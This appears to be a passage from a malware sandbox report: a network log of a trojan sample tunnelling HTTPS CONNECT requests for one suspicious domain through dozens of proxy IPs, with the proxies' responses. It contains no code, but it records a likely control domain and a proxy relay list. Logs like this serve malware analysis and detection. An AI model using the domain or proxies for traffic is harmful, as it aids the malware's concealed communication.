                                                                                Feb 23, 2024 14:28:29.621355057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.679373026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.695099115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.695364952 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.804128885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:05.804085016 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:17.804065943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1037192.168.2.852862103.231.78.36805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.656832933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1038192.168.2.853237172.67.182.96805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.657387972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.745731115 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1039192.168.2.849940109.195.98.207805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.686947107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.694964886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.695291042 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.757488966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.877293110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:55.736856937 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1040192.168.2.853206121.128.194.154805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.690557003 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1041192.168.2.8500435.252.23.24910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.690663099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.694961071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.695287943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.757489920 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1042192.168.2.85322745.138.87.23810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.690874100 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1043192.168.2.852039177.53.221.89441965828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.754344940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1044192.168.2.853203103.118.46.17480805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.755326033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1045192.168.2.853214171.248.219.10810805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.773138046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1046192.168.2.85321627.75.149.16910805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.805306911 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1047192.168.2.85322847.243.205.131285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.822273970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1048192.168.2.85299564.124.145.110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.823721886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1049192.168.2.853251104.20.89.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.834296942 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.924693108 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1050192.168.2.852745184.181.217.20141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.841197968 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1051192.168.2.85323642.49.148.16790015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.843934059 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:30.164679050 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1052192.168.2.85323847.242.15.120156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.846024036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1053192.168.2.853230171.247.98.9010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.848874092 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1054192.168.2.852948162.215.212.160546235828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.855467081 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.991799116 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.992010117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:41.992047071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:53.991775990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1055192.168.2.853269172.67.3.108805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.860668898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.947731018 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1056192.168.2.85297247.88.3.1980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.864373922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.341787100 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.23.4
                                                                                Date: Fri, 23 Feb 2024 13:28:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1057192.168.2.853051201.71.2.1039995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.867809057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898102045 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.042968988 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1058192.168.2.853029141.94.174.617725828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.868118048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.288701057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1059192.168.2.85321158.253.210.12288885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.868446112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1060192.168.2.85211094.131.107.4531285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.871876955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.898101091 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.898184061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.922715902 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1061192.168.2.853243171.247.241.15710805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.872263908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1062192.168.2.850246173.212.240.168588545828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.882200956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1063192.168.2.85018891.203.114.71429055828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.884124041 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1064192.168.2.853250185.109.184.150560675828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.909843922 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.398006916 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.991821051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.187791109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:34.492011070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.820532084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:39.141141891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.695276022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1065192.168.2.853263107.181.132.18361615828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.947500944 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.381293058 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                Proxy-Connection: close
                                                                                X-Webshare-Error: 407
                                                                                X-Webshare-Reason: invalidpassword
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Length: 121
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1066192.168.2.85325337.46.241.247805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.953783989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.165266991 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:30 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1067192.168.2.852821111.3.102.135300015828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:29.954016924 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1068192.168.2.85300565.20.216.24980805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
